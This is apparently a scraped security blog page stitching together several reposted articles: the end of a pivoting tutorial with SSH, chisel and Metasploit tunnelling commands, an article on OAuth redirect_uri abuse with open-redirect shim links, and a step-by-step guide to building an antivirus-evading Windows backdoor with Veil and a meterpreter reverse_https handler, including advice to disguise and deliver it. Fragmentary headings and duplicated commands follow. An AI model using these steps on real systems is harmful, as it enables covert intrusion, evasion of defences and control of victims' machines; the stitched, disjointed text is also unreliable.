ssh-keygen -y -f ~/.ssh/id_rsa > ~/.ssh/id_rsa.pub
# CREATE A TUNNEL
ssh -J root@10.10.10.2 DOMAIN/karmazrdp@123.123.123.4 -N -f -D 9999

The reason why you have to generate a new public key is if it belongs to a different identity file, then the SSH client will not initiate the connection.
Now you can use this tunnel via ProxyChains as before in scenario 1 and packets will be tunneled from the starting machine (10.10.10.1) to any host in the 123.123.124.0/24 subnet.

3.2. CHISEL & PROXYCHAINS

The above example with OpenSSH is more persistent and stable, but it takes more time to set up and administrator privileges are needed if the sshd is not preinstalled and enabled.
A quick way to achieve the same goal could be to set up SOCKS Proxies with chisel.exe and chisel.elf .

### ON STARTING HOST
# BUILD chisel.elf FOR  FIRST JUMP HOST - 10.10.10.2
GOOS=linux GOARCH=amd64 go build -ldflags="-s -w" .
# BUILD chisel.exe FOR  SECOND JUMP HOST - 10.10.10.2
GOOS=windows GOARCH=386 go build -ldflags="-s -w" .
# UPLAOD chisels TO FIRST JUMP HOST - 10.10.10.2
scp chisel root@10.10.10.2:/root/chisel
scp chisel.exe root@10.10.10.2:/root/chisel.exe
# OR DONWLOAD APPROPRIATE VERSION FROM RELEASE PAGE
https://github.com/jpillora/chisel/releases
# START THE CHISEL SERVER
./chisel server --socks5 --reverse -p 9001### ON THE FIRST JUMPHOST - 10.10.10.2
# CONNECT TO THE SERVER AND START REMOTE REVERSE ON 9998
./chisel client 10.10.10.1:9001 R:9998:socks &
# START THE CHISEL SERVER FOR SECOND JUMPHOST - 123.123.123.4
./chisel server --socks5 --reverse -p 9002### ON THE SECOND JUMPHOST - 123.123.123.4
# UPLOAD chisel.exe TO THE SECOND JUMPHOST AND RUN CHISEL CLIENT
.\chisel.exe client 123.123.123.2:9002 R:8888:socks

At the end edit the ProxyChains configuration file:

Now you can access the subnet 123.123.123.0/24 and the subnet 123.123.124.0/24 from your starting host 10.10.10.1 using ProxyChains

3.3. METASPLOIT & AUTOROUTE

You can use Metasploit if you managed to establish the meterpreter session with the (123.123.123.4).
You have the option to use this session for the second pivot to gain access to systems in the 123.123.124.0/24 subnet.

### ON YOUR HOST IN MSFCONSOLE (10.10.10.1)
# PIVOT USING ROUTE COMMAND
route add 123.123.124.0/24 3
# PIVOT USING AUTOROUTE
use post/multi/manage/autoroute
set session 3
run
# PIVOT USING AUTOROUTE IN METERPRETER SESSION
meterpreter> run autoroute -s 123.123.124.0/24
meterpreter> run autoroute -p

The Metasploit modules will “automagically” pivot through the (123.123.123.2) and then through (123.123.124.1) to access the internal network (123.123.124.0/24).

Originally published at: https://systemweakness.com/the-shades-of-tunneling-a8b6ce1d7fed

Open Authorisation Exploitation

Posted 3 years ago by Bartek Adach

Open Authorisation Exploitation

Cameron Coller, a SIEM Engineers at Stripe OLT, shares his thoughts on Open Authorisation Exploitation and demonstrates how it can so easily impact the everyday user…

We are all familiar with the old “I’ve got a Mac book – viruses and hackers can’t get me!” myth, because it is “oh-so-true” that if you’re running anything Apple, security doesn’t apply to you… What’s that? GDPR? ISO 27001? … I have a Mac!

Unfortunately, yet another myth seems to be catching on. MFA. Why oh why we don’t learn from history, and then wonder why history ends up repeating itself? There is no silver bullet to protecting ourselves. Yes, there are heavy precautions we can take to decrease risk and mitigate impact, but this does not remove risk entirely.

Multi-Factor Authentication is undoubtedly a great tool. I like it because I can get away with smaller passwords and tap a push notification and I’m in! Much nicer than forcing a 15+ character password that I’m going to forget when the session expires.

I don’t know what everyone else’s experience is, but recently I’ve been seeing a growing assumption that ‘x account is safe because MFA is enabled’…

We teach ‘don’t click links in emails’, but the same should be taught for browsing the clear web. Even from the most reputable advertising companies, social media sites deliver bad websites from time to time. Whether it’s a credential harvesting, a scam site or straight up malware it’s happened before and will happen again.

Now what I wanted to bring up was the issues surrounding ‘redirect_uri’ session poisoning. This effectively exploits the redirect_uri parameter handled in an oauth (open authorisation) request and leaks a token back to malicious actors who have specified an arbitrary client using various crafted URLs; some of which make use of URL shim bypass vulnerabilities and could theoretically bypass phishing protections such as safelinks.

The saddest of all is that, if the actors are able to craft the link extensively and could evade detection, they could steal the token from the users active session, and this would be invisible to the end user.

I like to compare this to a gated kingdom – your MFA is a double-gate, but if you’ve got an unwatched tunnel underneath your guarded double gate – what would be the point of that double gate?

So, I created an oauth troll with the thoughts that it could be used in a phishing simulation, in order to demonstrate what could potentially happen.

These URLs are shimmed using various providers trusted links – Facebook, Google, Slack all make use of open redirects and shimming (where applicable), but all this one does is log you out of your Office account, rather than steal the tokens.

Example of a safe redirect (1 step):

[https://www.google.com/url?sa=t&url=][https://www.office.com/estslogout?ru=%2F%3Fref%3Dlogout]

https://www.google.com/url?sa=t&url=https://www.office.com/estslogout?ru=%2F%3Fref%3Dlogout

Example of vulnerable open-redirect (2 step shim):

(Step 1)

[www.facebook.com/l.php?u=][https://www.office.com/estslogout?ru=%2F%3Fref%3Dlogout]

www.facebook.com/l.php?u=https://www.office.com/estslogout?ru=%2F%3Fref%3Dlogout

(Right click on follow link and copy link and then you get step 2 shimmed link)

Shim bypass version (Step 2)

[https://l.facebook.com/l.php?u=][https%3A%2F%2Fwww.office.com%2Festslogout%3Fru%3D%2F%3Fref%3Dlogout][&h=AT2BScF7QXZ3EAeMN6GUhmaENbpRC_RFMeSaS84lNm63f_h0xmZEm8MmLWZ-MRBdEnyPSohCsRSWNP3G9yj_4pgjao-seJsBFFGgi4H_d2WkwRo9WhR8cx6_UrYlvLvi]

https://l.facebook.com/l.php?u=https%3A%2F%2Fwww.office.com%2Festslogout%3Fru%3D%2F%3Fref%3Dlogout&h=AT2BScF7QXZ3EAeMN6GUhmaENbpRC_RFMeSaS84lNm63f_h0xmZEm8MmLWZ-MRBdEnyPSohCsRSWNP3G9yj_4pgjao-seJsBFFGgi4H_d2WkwRo9WhR8cx6_UrYlvLvi

In-fact it appears as though you can switch l.facebook.com to lm.facebook.com which is the mobile version. I’m not sure if it’s handled any differently but this was able to be switched after the link shim bypass:

https://lm.facebook.com/l.php?u=https%3A%2F%2Fwww.office.com%2Festslogout%3Fru%3D%2F%3Fref%3Dlogout&h=AT3Eyw1JRpYB7wb8L2ToiEf5DTGoKduj5wxC0g7DU4rRMb1PIjKm0idVq3k-GBsLhlaGJV_B83wyK-moXjZW-WZ7IIBCVLUr_QRczP4JE6Z2OZdnwGY9xQCaUh8XKpyq

Though Facebook are doing a better job of handling these, it seems as though the redirect shim expires in a shorter period of time, meaning it may have already done so.

If you’d prefer to switch this out with your Google account, logout and you can run with:

https://www.google.com/accounts/Logout

Authorisation Exploitation - Key Takeaways

There are many more examples of these, but you can find them yourself. Open redirects are everywhere too, you can grab them when you click on hyperlinks just by checking out the network tab on Chromium browsers…

I hope that this has proved beneficial for some people, and points out that just because you’re in the cloud, you aren’t immune from attacks. Some might even say this is easier than hacking your legacy infrastructure – I know I would – all I would have to do is convince your user to click a Facebook link, tell them it’s an embarrassing picture of them with a spoofed email from a colleague, then account access is granted.

Ultimately, I hope that this has shown the need for a SOC despite moving to the cloud. However, it’s not all bad – I believe it is still easier to manage, however it’s just not impenetrable like some people may believe it is.

How I created an undetectable Backdoor for Windows — Ethical Hacking

Posted 3 years ago by Bartek Adach

How I created an undetectable Backdoor for Windows — Ethical Hacking

by Gourav Dhar

What is a Backdoor?

Backdoor is a method of secretly gaining remote access to a computer by bypassing the normal authentication and firewall of the machine.

In this blog, I will be writing on How I created a backdoor for my Windows machine that even the antivirus could not detect. After creating the backdoor, I was able to do a lot of stuff on the Windows machine remotely like controlling the webcam, taking screenshots, using keyloggers, etc. Let’s get started.

I created the executable (.exe file) on my Ubuntu machine. This .exe file, when run on a windows machine, created a backdoor to my Ubuntu machine from where I was able to control everything on the windows machine.

Let’s look at the steps that need to be followed.

1. Installing Veil

As a first step, we need to install Veil. To install Veil you can go through this link https://www.javatpoint.com/installing-veil. It will also require installing the metasploitable-framework for ubuntu users(not required for Kali) which can be downloaded from here: https://www.darkoperator.com/installing-metasploit-in-ubunt.

Once installed, you can start by just typing veil . (or you can execute it by typing ./Veil.py in the directory veil is installed). The veil shell will open as shown below:

2. Using Evasion in Veil

The veil framework has 2 tools (Evasion and Ordinance) which can be seen by typing list in the veil shell. We are interested in Evasion, so we type

> use 1

3. Generating the Backdoor executable

In backdoors a reverse connection is created, i.e. when the target person double clicks the script, their computer will start the initiation of the backdoor. So it becomes undetectable by many antivirus software because there is no external machine requesting to connect. I also used port 8080 which is a common port used to connect to websites, so nothing would seem suspicious to the antivirus softwares.

Type :

> list

I will use the 15th option (it uses go as the programming language for the meterpreter), so I type :

> use 15

We need to set an IP address to which the backdoor will try to connect. In my case, it is my current computer, so I will set LHOST to the IP of this ubuntu machine (the attacking machine). I will also change the LPORT to 8080. To get my IP I used ifconfig .

To set the LHOST and LPORT run :

> set LHOST <your_IP>
> set LPORT 8080

The way anti-virus programs work is that they have a very large database of file signatures that are flagged as suspicious. If your file’s signature is present in that database then your file will be flagged as suspicious by the anti-virus softwares. So it is a good practice to use the updated version of veil , since the updated version of veil will generate backdoors to bypass the antivirus softwares.

We should try to modify the file and make it more unique so that it bypasses the antivirus. There’s no real reason I have written the next 2 lines. It is just to make the signature a little different to bypass the antivirus.

Next type generate to generate the file. A prompt will appear to name the backdoor. I named it backdoor_8080 but you could name it somewhat different so that it does not cause suspicion.

A page will appear showing you the location of the saved executable.

Congrats!!! The backdoor is generated. It is stored at : var/lib/veil/output/compiled/backdoor_8080.exe

4. Listening for Incoming Connections on the port

While creating the port I had used port 8080. So I will open the port on my ubuntu machine so that it is ready to connect when the target computer runs the executable. To do this I use the Metasploit framework. To run Metasploit console, run msfconsole

$ msfconsole

Note: The Veil-Evasion actually uses the Metasploit to generate the backdoor we created.

To open the port I used a module provided by Metasploit. It’s called multi/handler. So I run,

> use exploit/multi/handler

Type show options to see the options which are set

We will change these settings to suit our requirements. Run the following commands:

> set PAYLAOD windows/meterpreter/reverse_https
> set LHOST <IP>
> set LPORT 8080
> show options

Here <IP> is the IP used at the time of creating the backdoor

Type exploit to start listening on the port

> exploit

5. Delivering the backdoor to a target computer

There are various social engineering ways to deliver the backdoor to a target computer. One such way is described in the blog below, where I have written how to create a trojan. Basically, it disguised the .exe file in an image in a .jpg file.

6. Testing the backdoor on the Windows

Double-clicking on the backdoor_8080.exe file in the Windows machine executed my executable.

In the Metasploit where we were listening for connections in the ubuntu machine, we can see the metepreter shell has been opened.

The meterpreter shell will look like the one shown above. You can type help to get a long list of commands and their description as to what you can do.

A list of basic commands which you can run is

> sysinfo
> ipconfig
> pwd
> shell

Apart from these, you can also change user privileges, upload/download files, run this executable as a service, take screenshots, store keystrokes, and lots of other stuff.

Summarising Backdoors

While it seems that creating backdoors is something that is wrong and is done only by blackhat hackers, it is not entirely true. Some of the product-based companies also create backdoors into their products so that if their users lose access to their accounts or products the companies can help them gain access. While the above method is a good way to create backdoors, if you want to be on the ethical side of the line, do not use it to gain access to computers you don’t have permission to.

About the Author

To get updates on more such interesting topics follow me here. Feel free to comment and share your experiences and thoughts. Don’t forget to checkout my website at https://gourav-dhar.com for more tech related blogs.

The post originally published at: https://infosecwriteups.com/how-i-created-an-undetectable-backdoor-for-windows-ethical-hacking-d26e40a0ec

How are Honeypots Used in Endpoint Security?

What Is a Honeynet?

How to Deploy a Honeynet

INTRODUCTION

WHAT WILL YOU LEARN?

0. PREPARE THE ENVIRONMENT

1. RECONNAISSANCE PHASE

1.1. HOST DISCOVERY

1.2. PORT & VULNERABILITY SCANNING

1.3. BETTER HOST DISCOVERY & PORT & VULNERABILITY SCANNING

1.4. WEB APPLICATION VULNERABILITY SCANNING

1.5. ADDITIONAL INFRASTRUCTURE VULNERABILITY SCANNING

1.6. NESSUS VIA METASPLOIT

2. EXPLOITATION PHASE

2.1. SEARCHING & USING THE EXPLOIT MODULE

2.2. ALL-PORTS PAYLOADS

2.3. PAYLOAD GENERATION WITH MSFVENOM

2.4. GAINING SHELL & SESSION MANAGEMENT

2.5. PERSISTENCE

2.6. SHELLCODING

3. POST EXPLOITATION PHASE

3.1. PRIVILEGE ESCALATION & METERPRETER

3.2. AD PRIVILEGE ESCALATION — TOKEN IMPERSONATION

3.3. CREDENTIAL DUMPING

3.4. CRACKING THE HASHES

3.5. PIVOTING

3.6. HOST DISCOVERY & PORT SCANNING ONCE AGAIN

3.7. EXPLOITATION ONCE AGAIN

3.8. PASSWORD SPRAYING & PASSING THE HASHES

FINAL WORDS

What is a Hybrid Cloud?

Hybrid Cloud End User Security Challenges

Hybrid Cloud End User Security Best Practices

Conclusion

Good Places to Study Cybersecurity

University of Alabama at Birmingham

City University London

Macquarie University in Sydney

To Wrap It Up

The shades of tunneling

Solution for common pivoting problems during a Penetration Test

SCENARIO I

1.1. SSH & PROXYCHAINS

How do ProxyChains actually works?

1.2. METASPLOIT & AUTOROUTE & PORTFWD

ON YOUR HOST IN MSFCONSOLE (10.10.10.1) # CONDUCT TCP CONNECT SCAN use auxiliary/scanner/portscan/tcp set RHOSTS 123.123.123.0/24 set PORTS 1-1024 set THREADS 50 run

METASPLOIT TUNNEL FROM LOCALHOST TO 123.123.123.1 FOR RDP portfwd add –l 3389 –p 3389 –r 123.123.123.1 ### CONNECT USING TUNNEL rdesktop 127.0.0.1:3389

SCENARIO II

SCENARIO III

Open Authorisation Exploitation

Example of a safe redirect (1 step):

Example of vulnerable open-redirect (2 step shim):

Authorisation Exploitation - Key Takeaways

How I created an undetectable Backdoor for Windows — Ethical Hacking

What is a Backdoor?

1. Installing Veil

2. Using Evasion in Veil

3. Generating the Backdoor executable

4. Listening for Incoming Connections on the port

5. Delivering the backdoor to a target computer

Summarising Backdoors

ON YOUR HOST IN MSFCONSOLE (10.10.10.1)
# CONDUCT TCP CONNECT SCAN
use auxiliary/scanner/portscan/tcp
set RHOSTS 123.123.123.0/24
set PORTS 1-1024
set THREADS 50
run

METASPLOIT TUNNEL FROM LOCALHOST TO 123.123.123.1 FOR RDP
portfwd add –l 3389 –p 3389 –r 123.123.123.1
### CONNECT USING TUNNEL
rdesktop 127.0.0.1:3389